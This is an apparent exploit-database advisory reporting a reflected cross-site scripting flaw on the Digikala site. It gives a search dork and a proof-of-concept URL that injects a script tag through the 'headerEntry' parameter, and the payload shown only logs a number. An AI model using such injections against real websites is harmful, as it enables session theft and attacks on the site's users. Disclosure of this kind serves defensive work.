****************************
#Exploit Title: DIGIKALA - Cross Site Scripting Vulnerability (XSS)
#Date: 2020-10-01
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://www.digikala.com
#Google Dork: "Powered by Digikala"
#Tested On: windows 10


Proof of Concept:
Search google Dork: "Powered by Digikala"

https://www.digikala.com/landings/seller-introduction/?headerEntry=%3Cscript%3Econsole.log%285000%2F3000%29%3C%2Fscript%3E

**************************************************
#Discovered by: Mahdi Karimi
**************************************************